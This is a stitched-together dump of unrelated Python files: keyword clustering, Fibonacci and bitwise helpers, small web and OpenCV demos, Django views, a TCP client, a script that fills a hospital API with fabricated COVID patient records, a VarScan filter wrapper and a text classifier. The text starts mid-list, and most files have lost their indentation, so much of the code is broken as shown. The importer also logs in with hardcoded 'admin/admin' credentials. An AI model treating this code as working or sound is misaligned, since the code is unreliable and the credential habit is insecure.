"wo ",
"welche",
"was ",
"wobei ",
"womit ",
"woran ",
"wohin ",
"wobei ",
"wo ",
"weshalb ",
"warum ",
"wieso ",
"wieviel"
"worauf ",
"worum ",
"wovor ",
"wodurch ",
"woher ",
"weswegen ",
"woraus ",
])
q_words_ = np.array([
"who ",
"whom ",
"whose ",
"when ",
"which ",
"what ",
"what's",
"where ",
"why ",
"how ",
])
#%% -- functions --
"""
Wordstemm Clusters
This function clusters strings in "wordstemms"
"""
def wordstemm_clusters(
my_data = None,
str_key = 'Keyword',
filter_keys = [
'Wettbewerber / Aufteilung',
'Organisch vs. Paid',
'Keyword',
'Ø Suchanfragen pro Monat',
],
en_qflg = 0, de_qflg = 1,
n_st_min = 4,
thresholds = (4,500),
):
# re-defining globals to avoid possible overwrites (probably unnecessary)
q_words = q_words_.copy()
w_words = w_words_.copy()
if type(my_data) == type(None):
return None
raw = my_data[str_key].values.tolist()
if not en_qflg:
q_words = np.array([])
if not de_qflg:
w_words = np.array([])
#generate set of all possible groupings
groups = set()
for line in raw:
data = line.strip().split()
for item in data:
if len(item) >= n_st_min:
groups.add(item)
group_dict = {g:[] for g in groups}
group_dict['questions'] = []
#parse input into groups
for group in groups:
if len(group) < n_st_min:
continue
print("Group \'%s\':" % group)
for line in raw:
# lists for each specific question type to be present
w_check = list(map(lambda x: ' '+x in ' '+line+' ', w_words))
q_check = list(map(lambda x: ' '+x in ' '+line+' ', q_words))
if np.array(w_check).sum():
group_dict['questions'].append(line.strip())
if w_words[w_check][0] not in group_dict:
group_dict[w_words[w_check][0]] = [line.strip()]
else:
group_dict[w_words[w_check][0]].append(line.strip())
if np.array(q_check).sum():
group_dict['questions'].append(line.strip())
if q_words[q_check][0] not in group_dict:
group_dict[q_words[q_check][0]] = [line.strip()]
else:
group_dict[q_words[q_check][0]].append(line.strip())
            if line.find(group) != -1:
print(line.strip())
group_dict[group].append(line.strip())
print()
# all questions will be a specific exception
exceptions = np.array([],dtype=str)
exceptions = np.append(exceptions,np.array(w_words))
exceptions = np.append(exceptions,np.array(q_words))
group_df = dict_to_df(group_dict, thresholds=thresholds,exceptions=exceptions)
group_df[:][group_df=='nan'] = ''
group_df = group_df.reindex(sorted(group_df.columns), axis=1)
data_df = my_data.filter(filter_keys)
data_df['wordstemms'] = pd.Series(np.empty(data_df[str_key].values.shape,dtype=str))
for gr in sorted(group_df.columns):
data_df.loc[data_df[str_key].isin(group_df[gr]),'wordstemms'] = \
data_df['wordstemms'].loc[data_df[str_key].isin(group_df[gr])].values + gr+', '
data_df[gr] = pd.Series(data_df[str_key].isin(group_df[gr]).astype(int))
return data_df, group_df
def wordstemm_bag(
my_data = None,
str_key = 'Keyword',
filter_keys = [
'Wettbewerber / Aufteilung',
'Organisch vs. Paid',
'Keyword',
'Ø Suchanfragen pro Monat',
],
en_qflg = 0, de_qflg = 1,
n_st_min = 4,
thresholds = (4,500),
):
# re-defining globals to avoid possible overwrites (probably unnecessary)
q_words = q_words_.copy()
w_words = w_words_.copy()
if type(my_data) == type(None):
return None
raw = my_data[str_key].values.tolist()
if not en_qflg:
q_words = np.array([])
if not de_qflg:
w_words = np.array([])
# dictionary with possible n-gramms and all its cases
group_dict = {}
group_dict['questions'] = []
# generate set of all possible groupings
groups = set()
for line in raw:
data = line.strip().split()
for group in data:
if len(group) < n_st_min:
continue
groups.add(group)
w_check = list(map(lambda x: ' '+x in ' '+line+' ', w_words))
q_check = list(map(lambda x: ' '+x in ' '+line+' ', q_words))
if np.array(w_check).sum():
group_dict['questions'].append(line.strip())
if w_words[w_check][0] not in group_dict:
group_dict[w_words[w_check][0]] = [line.strip()]
else:
group_dict[w_words[w_check][0]].append(line.strip())
if np.array(q_check).sum():
group_dict['questions'].append(line.strip())
if q_words[q_check][0] not in group_dict:
group_dict[q_words[q_check][0]] = [line.strip()]
else:
group_dict[q_words[q_check][0]].append(line.strip())
            if line.find(group) != -1:
if not group in group_dict.keys():
group_dict[group] = []
group_dict[group].append(line.strip())
if not en_qflg:
q_words = np.array([])
if not de_qflg:
w_words = np.array([])
exceptions = np.array([],dtype=str)
exceptions = np.append(exceptions,np.array(w_words))
exceptions = np.append(exceptions,np.array(q_words))
return dict_to_df(group_dict, thresholds=thresholds,exceptions=exceptions)
#def indep_ngrams(text,stop_words=[]):
#
#
#
# for
# if type()
#
#
# return ngram_list
|
def convtobin(n,l):
a=[]
c=n
while c>0:
a.append(c%2)
        c = c // 2  # integer division; '/' would produce floats and wrong digits in Python 3
while len(a) < l:
a.append(0)
return a
def bitwisedig(m,n,k):
r = m % (2**k)
if r < 2**(k-1):
return 0
else:
if n-m > 2**k -r-1:
return 0
else:
return 1
def bitwiseand(m,n):
a=[]
k=0
while 2**k <= n:
a.append(bitwisedig(m,n,k+1))
k+=1
c=0
for j in range(len(a)):
c+= a[j]*(2**j)
return c
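# Quick illustrative check (not part of the original): bitwiseand(m, n) computes
# the bitwise AND of every integer in the range [m, n], so it can be compared
# against a straightforward reduce over that range.
if __name__ == '__main__':
    from functools import reduce
    m, n = 12, 18
    print(bitwiseand(m, n), reduce(lambda a, b: a & b, range(m, n + 1)))  # both 0
    print(convtobin(6, 8))  # digits of 6, least-significant bit first: [0, 1, 1, 0, 0, 0, 0, 0]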
|
import os
from typing import Type
import polars as pl
__all__ = [
"Config",
]
class Config:
"Configure polars"
@classmethod
def set_utf8_tables(cls) -> "Type[Config]":
"""
Use utf8 characters to print tables
"""
        os.environ.pop("POLARS_FMT_NO_UTF8", None)  # os.environ has no unsetenv(); pop() removes the variable if set
return cls
@classmethod
def set_ascii_tables(cls) -> "Type[Config]":
"""
Use ascii characters to print tables
"""
os.environ["POLARS_FMT_NO_UTF8"] = "1"
return cls
@classmethod
def set_tbl_width_chars(cls, width: int) -> "Type[Config]":
"""
Set the number of character used to draw the table
Parameters
----------
width
number of chars
"""
os.environ["POLARS_TABLE_WIDTH"] = str(width)
return cls
@classmethod
def set_tbl_rows(cls, n: int) -> "Type[Config]":
"""
Set the number of rows used to print tables
Parameters
----------
n
number of rows to print
"""
os.environ["POLARS_FMT_MAX_ROWS"] = str(n)
return cls
@classmethod
def set_tbl_cols(cls, n: int) -> "Type[Config]":
"""
Set the number of columns used to print tables
Parameters
----------
n
number of columns to print
"""
os.environ["POLARS_FMT_MAX_COLS"] = str(n)
return cls
@classmethod
def set_global_string_cache(cls) -> "Type[Config]":
"""
Turn on the global string cache
"""
pl.toggle_string_cache(True)
return cls
@classmethod
def unset_global_string_cache(cls) -> "Type[Config]":
"""
Turn off the global string cache
"""
pl.toggle_string_cache(False)
return cls
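# Illustrative usage sketch (assumes polars is installed): every classmethod
# returns the class itself, so settings can be chained.
if __name__ == "__main__":
    Config.set_ascii_tables().set_tbl_rows(20).set_tbl_cols(10)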
|
from math import log
phi = (1 + 5 ** 0.5) / 2
def fib(n):
'''
Find the Fibonacci number using Binet's formula.
'''
return int(round((phi ** n - (1 - phi) ** n) / 5 ** 0.5))
def fibinv(f):
'''
Inverse Fibonacci function using Binet's formula.
'''
    if f < 2:
        return f  # fib(0) == 0 and fib(1) == 1; the log formula is unstable this close to zero
return int(round(log(f * 5 ** 0.5) / log(phi)))
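# Illustrative round-trip check (not part of the original): fibinv should invert
# fib wherever Binet's formula is numerically exact.
if __name__ == '__main__':
    for n in range(2, 20):
        assert fibinv(fib(n)) == n
    print(fib(10), fibinv(55))  # 55 10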
|
# 🚨 Don't change the code below 👇
print("Welcome to the Love Calculator!")
name1 = input("What is your name? \n")
name2 = input("What is the name of the person you like? \n")
# 🚨 Don't change the code above 👆
#Write your code below this line 👇
name1_lower_case = name1.lower()
name2_lower_case = name2.lower()
true = 0
true += name1_lower_case.count("t")
true += name2_lower_case.count("t")
true += name1_lower_case.count("r")
true += name2_lower_case.count("r")
true += name1_lower_case.count("u")
true += name2_lower_case.count("u")
true += name1_lower_case.count("e")
true += name2_lower_case.count("e")
love = 0
love += name1_lower_case.count("l")
love += name2_lower_case.count("l")
love += name1_lower_case.count("o")
love += name2_lower_case.count("o")
love += name1_lower_case.count("v")
love += name2_lower_case.count("v")
love += name1_lower_case.count("e")
love += name2_lower_case.count("e")
true_love = int(str(true) + str(love))
if true_love >= 40 and true_love <= 50:
print(f"Your score is {true_love}, you are alright together.")
elif true_love < 10 or true_love > 90:
print(f"Your score is {true_love}, you go together like coke and mentos.")
else:
print(f"Your score is {true_love}.")
|
from pywebio import *
from pywebio.output import *
from pywebio.input import *
from pywebio.pin import *
from pywebio.session import hold
def put_pin_value(text):
with use_scope('text_output', clear=True):
put_text(text)
def main():
put_table([
['Commodity', 'Price / unit'],
['Apple', '0.5'],
['Banana', '0.4'],
['Avacado', '1.2'],
])
put_tabs([
{'title': 'Search by fruit', 'content': [
put_row(
[put_input('fruit'),
put_buttons(['search'], lambda _: put_pin_value(pin.fruit)),
], )
]},
{'title': 'Search by price', 'content': [
put_row(
[put_input('price'),
put_buttons(['search'], lambda _: put_pin_value(pin.price)),
], )
]},
{'title': 'Help', 'content': 'Input a fruit name of interest then hit the search button.'},
])
use_scope('text_output')
hold()
|
import cv2
import numpy as np
image = cv2.imread("image/picasso.jpg")
cv2.imshow("Original",image)
cv2.waitKey(0)
mask = np.zeros(image.shape[:2],dtype = "uint8")
(cX,cY) = ( image.shape[1] // 2 , image.shape[0] // 2 )
cv2.rectangle(mask,(cX-75,cY-75),(cX+75,cY+75),255,-1)
cv2.imshow("Mask",mask)
cv2.waitKey(0)
print(image.shape[0],image.shape[1])
masked = cv2.bitwise_and(image,image,mask = mask)
cv2.imshow("Mask applied to Image",masked)
cv2.waitKey(0)
mask = np.zeros(image.shape[:2],dtype = "uint8")
cv2.circle(mask,(cX,cY),100,255,-1)
cv2.imshow("Mask Circle",mask)
cv2.waitKey(0)
masked = cv2.bitwise_and(image,image,mask = mask)
cv2.imshow("Mask applied to Image Circle",masked)
cv2.waitKey(0)
|
from flask import Flask, render_template, request, jsonify
import imdb
APP = Flask(__name__)
DEFAULT_SEASON = 1
@APP.route('/')
def search_page():
return render_template('trivia.html')
@APP.route('/show')
def show():
opt_args = {}
if 'year' in request.args.keys():
opt_args['year'] = int(request.args['year'])
if 'season' in request.args.keys():
opt_args['season_start'] = int(request.args['season'])
opt_args['season_end'] = int(request.args['season'])
else:
opt_args['season_start'] = opt_args['season_end'] = 1
print([i for i in request.args.keys()])
show_data = imdb.OMDBAPIShowFactory(request.args['title'], **opt_args).create()
return jsonify(show_data.serialize())
@APP.route('/episode')
def episode():
opt_args = {}
    ep_id = request.args.get('ep_id', None)  # request.args is a dict-like mapping, not callable
if ep_id:
show_data = imdb.OMDBAPIShowFactory(request.args['title'], has_trivia=False, **opt_args).create()
return jsonify(show_data.serialize())
else:
pass
# return 404
|
from pyUbiForge.misc.file_object import FileObjectDataWrapper
from pyUbiForge.misc.file_readers import BaseReader
class Reader(BaseReader):
file_type = '0E5A450A'
def __init__(self, file_object_data_wrapper: FileObjectDataWrapper):
# readStr(fIn, fOut, 184)
file_object_data_wrapper.read_bytes(14)
for _ in range(2):
file_object_data_wrapper.read_file()
file_object_data_wrapper.read_bytes(1)
check_byte = file_object_data_wrapper.read_uint_8()
if check_byte != 3:
file_object_data_wrapper.read_id()
count = file_object_data_wrapper.read_uint_32()
for _ in range(count):
file_object_data_wrapper.read_bytes(1)
file_object_data_wrapper.read_id()
file_object_data_wrapper.read_bytes(9)
|
# Recursive Call
def Fibonacci(num):
if num <= 1:
return num
return Fibonacci(num-1) + Fibonacci(num-2)
# Dynamic Programming - Fibonacci
def DP_Fibonacci(num):
    if num < 2:
        return num  # guard: cache[1] below would raise IndexError for num == 0
    cache = [0 for _ in range(num+1)]
    cache[0] = 0
    cache[1] = 1
for index in range(2, num+1):
cache[index] = cache[index-1] + cache[index-2]
return cache[num]
def DP_Pascal(rowIndex):
cache = [1 for _ in range(rowIndex)]
if rowIndex == 0:
return [1]
if rowIndex == 1:
return [1, 1]
for start in range(1, rowIndex):
for idx in range(start, 0, -1):
cache[idx] = cache[idx] + cache[idx-1]
return cache + [1]
if __name__ == '__main__':
import time
start_time = time.time()
Fibonacci(30)
end_time = time.time()
print("Recursive: ", end_time - start_time)
start_time = time.time()
DP_Fibonacci(30)
end_time = time.time()
print("Dynamic Programming: ", end_time - start_time)
'''
Recursive: 0.24840807914733887
Dynamic Programming: 1.3113021850585938e-05
'''
|
def read_line(linename, writename):
    with open(linename, 'r') as f:  # if opened with 'a+' you would need seek(0)
        # f.seek(0)  # rewind to the start
        content = f.read()  # renamed from 'str' to avoid shadowing the built-in
        print(content)
    with open(writename, 'w') as e:
        # e.seek(0)  # rewind to the start
        e.write(content)
# read_line("D://hello.txt")
|
class Settings():
def __init__(self, LRslowMode = True, Slow = False, PrintLevel = 0):
self.LRslowMode = LRslowMode
self.Slow = Slow
self.PrintLevel = PrintLevel
|
import pandas as pd
import array
df = pd.read_csv("IMDB_movies_dataset.csv", low_memory=False, error_bad_lines=False)
df['language'] = df['language'].fillna('')
filtered_csv = pd.DataFrame()
for i in range(1960, 2020):
temp = df[df['year'] == str(i)]
filtered_csv = pd.concat([filtered_csv, temp], axis=0)
filtered_csv = filtered_csv[filtered_csv['language'].str.contains('English', regex=False)]
filtered_csv = filtered_csv[filtered_csv['avg_vote'].astype(float)>=6]
arr = []
for j in range(0,filtered_csv.shape[0]):
arr.append(j)
filtered_csv["id"] = arr
filtered_csv.to_csv('IMDB_movies_big_dataset_clean.csv')
|
# -*- encoding: utf-8 -*-
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from models import ItemAgenda
from forms import FormItemAgenda
def index(request):
return HttpResponse(u"Hello World")
@login_required
def lista(request):
# lista_itens = ItemAgenda.objects.all()
lista_itens = ItemAgenda.objects.filter(usuario = request.user)
return render_to_response("lista.html", {'lista_itens': lista_itens })
@login_required
def adiciona(request):
    if request.method == 'POST':  # form was submitted
form = FormItemAgenda(request.POST, request.FILES)
if form.is_valid():
dados = form.cleaned_data
item = ItemAgenda(data = dados['data'],
hora = dados['hora'],
titulo = dados['titulo'],
descricao = dados['descricao'])
item = form.save(commit=False)
item.usuario = request.user
item.save()
return render_to_response('salvo.html', {})
    else:  # reached via a link - GET
form = FormItemAgenda()
return render_to_response("adiciona.html", {'form': form}, context_instance=RequestContext(request))
@login_required
def item(request, nr_item):
item = get_object_or_404(ItemAgenda, pk=nr_item, usuario=request.user)
if request.method == 'POST':
form = FormItemAgenda(request.POST, request.FILES, instance=item)
if form.is_valid():
form.save()
return render_to_response('salvo.html', {})
else:
form = FormItemAgenda(instance=item)
return render_to_response('item.html',{'form': form}, context_instance=RequestContext(request))
|
from project.settings import * # noqa
DEBUG = True
CELERY_TASK_ALWAYS_EAGER = True
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
ENABLE_HTTP_BASIC_AUTH = False
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
MEDIA_ROOT = os.path.join(MEDIA_ROOT, 'test')
|
import socket
"""
*****需求:模拟客户端向服务发起tcp链接请求********
1. 创建客户端套接字
2. 发出连接请求
3. 收发数据
4. 关闭套接字
"""
# 1. 创建客户端套接字
tcp_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 获取服务器的IP地址和端口号
server_ip = input("请输入您要连接的服务器的ip地址:")
server_port = int(input("请输入服务器的端口号:"))
# 2. 向服务器发起连接请求
tcp_client_socket.connect((server_ip, server_port))
# 3. 接收发送数据
send_data = input("请输入您要发送的数据")
tcp_client_socket.send(send_data.encode('utf-8'))
recv_data = tcp_client_socket.recv(4096)
print("收到的数据为:%s" % recv_data.decode('utf-8'))
# 4. 关闭套接字
tcp_client_socket.close()
|
from elements.code_elements import GenericElement
from elements.return_types import *
class StringElement(GenericElement):
return_type = STR
def __init__(self, string: str):
self.string = self._clean_string(string)
def _clean_string(self, string):
return string.replace('"', '""')
def write_out(self, sqf=False):
return '"{}"'.format(self.string)
class ArrayElement(GenericElement):
return_type = ARRAY
def __init__(self):
self.contents = []
def add_element(self, element: GenericElement):
self.contents.append(element)
def add_element_list(self, element_list: list):
for element in element_list:
self.add_element(element)
def write_out(self, sqf=False):
array_str = "["
for element in self.contents:
array_str += "{}, ".format(element.write_out(sqf))
array_str = array_str[:-2] + "]"
return array_str
class NumberElement(GenericElement):
return_type = NUM
def __init__(self, number: GenericElement):
self.number = number
def write_out(self, sqf=False):
return "{}".format(self.number)
class BooleanElement(GenericElement):
return_type = BOOL
def __init__(self, value: bool):
self.value = value
def write_out(self, sqf=False):
if sqf:
return str(self.value).lower()
else:
return str(self.value)
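# Illustrative usage sketch (assumes the elements package imported above is on the
# path): compose an array of mixed elements and emit it in plain and SQF form.
if __name__ == '__main__':
    arr = ArrayElement()
    arr.add_element_list([StringElement('say "hi"'), NumberElement(42), BooleanElement(True)])
    print(arr.write_out())          # ["say ""hi""", 42, True]
    print(arr.write_out(sqf=True))  # ["say ""hi""", 42, true]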
|
import datetime
import json
import random
import time
import traceback
import faker
import requests
from tqdm import tqdm
import os
# Data source:
# https://raw.githubusercontent.com/BlankerL/DXY-COVID-19-Data/master/json/DXYArea-TimeSeries.json
fake = faker.Factory.create("zh-CN")
api = "http://45.77.26.112/"
api = "http://localhost/"
# api = "http://8.210.248.203/"
s = requests.session()
res = json.loads(s.post(api + "user/logIn?identifier=admin&password=admin").text)
print(res)
with open('DXYArea-TimeSeries.json', 'r') as f:
data = json.load(f)
china = []
for one in data:
if (one['countryName'] == '中国'):
one['updateTime'] = time.strftime(
"%Y-%m-%d", time.localtime(one['updateTime'] // 1000))
china.append(one)
def new_hospital(address, name):
p = {
'address': address,
'name': name
}
res = s.post(api + 'hospital/createHospital', data=p)
print(json.loads(res.text))
logf = open('importer.log', 'a+')
def log(s, sender=''):
if sender=='DIAGNOSIS':
return
global logf
fs = "<{} {}>: {}".format(datetime.datetime.now().isoformat()[:-4], sender, s)
print(fs)
logf.write(fs + '\n')
departments = ['神经内科', '呼吸内科', '心血管科', '消化内科', '肾内科', '血液科', '内分泌科',
'传染科', '神经外科', '耳鼻喉科', '口腔科', '肛肠科', '骨科', '皮肤科', '妇科', '肿瘤外科',
'泌尿外科', '生殖科', '麻醉科', '精神科', '康复科', '体检科', '普通外科', '血液科', '风湿代谢科', '中医科', '疼痛科', '预防保健科', '肝胆胰脾外科',
'传染科', '传染科', '传染科', '传染科', '传染科', '急诊科']
def new_doctor():
profile = fake.profile()
doctor = {
'birthday': profile['birthdate'].strftime("%Y-%m-%d"),
'department': random.choice(departments),
'gender': profile['sex'],
'hospital_id': random.randint(1, 540),
'name': profile['name']
}
res = s.post(api + 'doctor/createDoctor', data=doctor)
log(json.loads(res.text)['data'])
# for i in range(4993):
# print("\r{} / 4993".format(i))
# new_doctor()
city = set()
citytimeline = {}
for one in china:
try:
for two in one['cities']:
city.add(two['cityName'])
citytimeline[two['cityName']] = []
except:
pass
for one in china:
try:
for two in one['cities']:
citytimeline[two['cityName']].insert(0, {
'city': two['cityName'],
'province': one['provinceName'],
"date": one['updateTime'],
'currentConfirmedCount': two['currentConfirmedCount'],
'confirmedCount': two['confirmedCount'],
'suspectedCount': two['suspectedCount'],
'curedCount': two['curedCount'],
'deadCount': two['deadCount']
})
except:
pass
status = ['治疗中', '治疗中', '治疗中', '治疗中', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '治疗中',
'治疗中', '治疗中', '治疗中', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复']
def new_status():
r = random.random();
if (r < 0.035):
return '已死亡'
elif (r > 0.8):
return '治疗中'
else:
return '已治愈'
BEGIN_PATIENT = 0
CURRENT = 0
def new_diagnosis(doctor_id, patient_id, time, diag):
data = {
"doctor_id": doctor_id,
"nucleic_acid": diag['dna'],
"patient_id": patient_id,
"symptom": diag['words'],
"temperature": diag['temp'],
"time": time.isoformat(),
}
res = s.post(api + "diagnosis/createDiagnosis", data=data)
res = json.loads(res.text)['data']
log(res, sender="DIAGNOSIS")
diagnosis = [
{
"temp": random.randint(360, 370) / 10,
"words": "病情稳定,情况良好。",
"dna": 0
},
{
"temp": random.randint(370, 380) / 10,
"words": "轻微发烧症状,呼吸略有困难,需要进一步确定情况。",
"dna": 0
},
{
"temp": random.randint(370, 380) / 10,
"words": "已确诊为新冠肺炎,病状较轻,应注意控制以避免病情恶化。",
"dna": 1
},
{
"temp": random.randint(370, 380) / 10,
"words": "呼吸略有困难,应当辅助药物治疗,并保证已经被隔离。",
"dna": 1
},
{
"temp": random.randint(380, 390) / 10,
"words": "温度较高,应特别关注病情,有突发情况及时处理。",
"dna": 1
},
{
"temp": random.randint(380, 390) / 10,
"words": "温度较高,但核酸检测阴性,目前应当按照普通流感和肺炎治疗处理,并考虑再次核酸检测避免误诊。",
"dna": 0
},
{
"temp": random.randint(390, 395) / 10,
"words": "状态很危险,应辅助呼吸治疗,必要时转入重点监护病房。",
"dna": 1
},
{
"temp": random.randint(395, 412) / 10,
"words": "状态极其危险,应作为重点监护对象,保持密切关注,辅助生命维持设备。",
"dna": 1
},
]
def new_patient(city, province, date, status):
global CURRENT
CURRENT = CURRENT + 1
if CURRENT < BEGIN_PATIENT:
return
try:
hospital = json.loads(s.post(api + 'hospital/getHospitalInfo', data={"address": city}).text)['data']
doctors = json.loads(s.post(api + 'doctor/getDoctorInfo',
data={"hospital_id": hospital[0]['hospital_id']}).text)['data']
profile = fake.profile()
patient = {
'birthday': profile['birthdate'].strftime("%Y-%m-%d"),
'confirm_date': date,
# 'doctor_id': random.randint(0, 9146),
'doctor_id': random.choice(doctors)['doctor_id'],
# 'gendLer': 1 if profile['sex'] == 'M' else 0,
'gender': profile['sex'],
'hospital_id': hospital[0]['hospital_id'],
# 'hospital_id': city + "第一人民医院",
# 'hospital_id': city + "第一人民医院" if (city.find('人员') == -1 and city.find('境外') == -1 and city.find('监狱') ==
# -1) else "中心医院",
'name': profile['name'],
'onset_date': date,
'onset_place': province + city,
'is_doctor': '0',
'status': status
}
res = s.post(api + 'patient/createPatient', data=patient)
res = json.loads(res.text)['data']
log(res, sender="PATIENT")
### Create diagnosis
startdate = datetime.datetime.fromisoformat(patient['confirm_date'])
for day in range(29):
thisdate = startdate + datetime.timedelta(days=day, hours=random.randint(7, 23), minutes=
random.randint(0, 60))
new_diagnosis(patient['doctor_id'], res['patient_id'], thisdate, random.choice(diagnosis))
# Last day
thisdate = startdate + datetime.timedelta(days=30, hours=random.randint(7, 23), minutes=random.randint(0, 60))
if (patient['status'] == '已死亡'):
new_diagnosis(patient['doctor_id'], res['patient_id'], thisdate, diagnosis[-1])
elif (patient['status'] == '已治愈'):
new_diagnosis(patient['doctor_id'], res['patient_id'], thisdate, diagnosis[0])
except:
with open('importerError.log', 'a+') as f:
traceback.print_exc()
f.write('<{}>: Error occurred in patient({}, {}, {}, {})\n'.format(datetime.datetime.now().isoformat()[:-4], city, province, date, status))
# Generate patients, diagnoses and prescriptions
# for one in tqdm(citytimeline.values(), desc="Enumerating Cities"):
# for i, today in tqdm(enumerate(one), desc="Enumerating Patients"):
# if i == 0:
# newCount = today['confirmedCount']
# newDead = today['deadCount']
# else:
# newCount = today['confirmedCount'] - one[i - 1]['confirmedCount']
# newDead = today['deadCount'] - one[i - 1]['deadCount']
# for t in range(newCount - newDead):
# new_patient(today['city'], today['province'], today['date'], random.choice(status))
# for t in range(newDead):
# new_patient(today['city'], today['province'], today['date'], '已死亡')
|
# Copyright (c) 2021 Mahdi Biparva, mahdi.biparva@gmail.com
# miTorch: Medical Imaging with PyTorch
# Deep Learning Package for 3D medical imaging in PyTorch
# Implemented by Mahdi Biparva, April 2021
# Brain Imaging Lab, Sunnybrook Research Institute (SRI)
from itertools import product
import warnings
def len_hp_set(hp_set):
output_len = 1
for v in hp_set.values():
output_len *= len(v)
return output_len
def len_hp_param(hp_param):
output_len = 1
for v in hp_param:
if v['type'] == 'choice':
output_len *= len(v['values'])
return output_len
def set_hp_cfg(cfg, in_item):
key, value = in_item
assert isinstance(key, str) and len(key)
key_list = key.split('.')
key_par = cfg
for i, k in enumerate(key_list):
if i == len(key_list) - 1:
break
key_par = key_par.get(k, None)
setattr(key_par, key_list[-1], value)
return cfg
def hp_gen_set_cfg(hps_tuple, cfg):
hps_dict = dict()
for k, v in hps_tuple:
cfg = set_hp_cfg(cfg, (k, v))
hps_dict[k] = v
return hps_dict, cfg
def hp_gen(cfg, hp_set):
for hps in product(*hp_set.values()):
hps_tuple = tuple(zip(hp_set.keys(), hps))
yield hp_gen_set_cfg(hps_tuple, cfg)
def exp_range_finder(cfg, len_exps):
hpo = cfg.get('HPO')
hpo_range_start = hpo.get('RANGE_START')
hpo_range_len = hpo.get('RANGE_LEN')
hpo_range_len = len_exps if hpo_range_len == 0 else hpo_range_len
hpo_range_end = hpo_range_start + hpo_range_len
assert 0 <= hpo_range_start
assert 0 < hpo_range_len
if hpo_range_start >= len_exps:
warnings.warn('hpo_range_start >= len_exps')
if hpo_range_end > len_exps:
warnings.warn('hpo_range_end > len_exps')
return hpo_range_start, hpo_range_end
|
#!/usr/bin/env python
__author__ = "Alessandro Coppe"
'''
Given a set of directories with VarScan2 VCFs obtained from iWhale or vs_format_converter.py (varscan_accessories)
it filters it using somaticFilter command from varscan.jar software
'''
import argparse
import os.path
import os
import sys
import pathlib
import subprocess
class bcolors:
OKGREEN = '\033[92m'
ERROR = '\033[91m'
ENDC = '\033[0m'
def main():
parser = argparse.ArgumentParser(description="Filter out VCFS produced by VarScan2")
parser.add_argument('-c', '--min_coverage', action='store', type=int, help="Minimum read depth [20]", required=False, default=20)
parser.add_argument('-r', '--min_reads2', action='store', type=int, help="Minimum supporting reads for a variant [5]", required=False, default=5)
parser.add_argument('-s', '--min_strands2', action='store', type=int, help="Minimum # of strands on which variant observed (1 or 2) [1]", required=False, default=1)
parser.add_argument('-q', '--min_avg_qual', action='store', type=int, help="Minimum average base quality for variant-supporting reads [30]", required=False, default=30)
parser.add_argument('-f', '--min_var_freq', action='store', type=float, help="Minimum variant allele frequency threshold [0.05]", required=False, default=0.05)
parser.add_argument('-p', '--p_value', action='store', type=float, help="Default p-value threshold for calling variants [0.05]", required=False, default=0.05)
parser.add_argument('-d', '--directory', action='store', type=str, help="The directory containing VarScan2 VCFs", required=False, default='.')
parser.add_argument('-o', '--output_directory', action='store', type=str, help="The output directory", required=False, default='.')
args = parser.parse_args()
min_coverage = args.min_coverage
min_reads2 = args.min_reads2
min_strands2 = args.min_strands2
min_avg_qual = args.min_avg_qual
min_var_freq = args.min_var_freq
p_value = args.p_value
directory = args.directory
output_directory = args.output_directory
if os.path.isdir(directory) == False:
print(bcolors.ERROR + "{} is not a directory".format(directory) + bcolors.ENDC )
sys.exit()
if os.path.isdir(output_directory) == False:
print(bcolors.ERROR + "{} is not a directory".format(output_directory) + bcolors.ENDC )
sys.exit()
for entry in os.listdir(directory):
path = os.path.join(directory, entry)
if os.path.isfile(path):
spliced_input_name = entry.split("_")
spliced_input_name = spliced_input_name[:len(spliced_input_name) - 1]
spliced_input_name = "_".join(spliced_input_name)
output_name = spliced_input_name + "_varscan_filtered.vcf"
output_file_path = os.path.join(output_directory, output_name)
command = ["java", "-jar", "/home/ale/local/varscan.jar", "somaticFilter", path, "--output-file", output_file_path, "--min-coverage", str(min_coverage), "--min-reads2", str(min_reads2), "--min-strands2", str(min_strands2), "--min-avg-qual", str(min_avg_qual), "--min-var-freq", str(min_var_freq), "--p-value", str(p_value)]
print(bcolors.OKGREEN + " ".join(command) + bcolors.ENDC)
subprocess.run(command)
if __name__ == "__main__":
main()
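# Example invocation (the script and directory names below are illustrative, not from the source):
#   python varscan_somatic_filter.py -d ./varscan_vcfs -o ./filtered -c 30 -f 0.10
# Each input VCF is passed to `varscan.jar somaticFilter` and written to the output directory
# with a "_varscan_filtered.vcf" suffix.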
|
# -*- coding: UTF-8 -*-
import csv
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score
STOP_WORDS="english"
# STOP_WORDS=None
MAX_FEATURES = 1000
MIN_DF = 0.1
MAX_DF = 0.5
# read csv input file
def read_data(input_file):
with open(input_file, 'r') as file:
# fields are: label, title and text
reader = csv.DictReader(file, fieldnames=["label", "title", "text"])
# initialize texts and labels arrays
texts = []
labels = []
# iterate over file rows
for row in reader:
# append label and texts
labels.append(int(row["label"]))
texts.append(row["text"])
return labels, texts
# main program
def main():
# open test and train data
test_labels, test_texts = read_data('db/ag_news_csv/test.csv')
train_labels, train_texts = read_data('db/ag_news_csv/train.csv')
# initialize tfidf vectorizer
tfidf = TfidfVectorizer(strip_accents="ascii",stop_words=STOP_WORDS,max_features=MAX_FEATURES)
# fit tfidf with train texts
tfidf.fit(train_texts)
# transform train and test texts to numerical features
train_features = tfidf.transform(train_texts)
test_features = tfidf.transform(test_texts)
clf = LinearSVC()
clf.fit(train_features,train_labels)
pred = clf.predict(test_features)
print "Accuracy:", accuracy_score(test_labels, pred)
if __name__ == "__main__":
main()
|
import numpy as np
import os
def calculateTop50(inputDirName, outputDirName):
    """For every column of the input matrix, write the indices of its 50 largest entries."""
    fwrite = open(outputDirName, 'w')
    matrix = np.loadtxt(inputDirName, dtype='float', comments='#', delimiter=None)
    matrix = matrix.transpose()
    for i in range(matrix.shape[0]):
        # indices of the 50 largest values in row i (an original column), in descending order
        output = matrix[i].argsort()[-50:][::-1]
        for j in range(50):
            fwrite.write(str(output[j]) + ' ')
        fwrite.write('\n')
    fwrite.close()
|
print(2 + 5)
print(10 - 4)
print(5 * 7)
print(60 / 6)
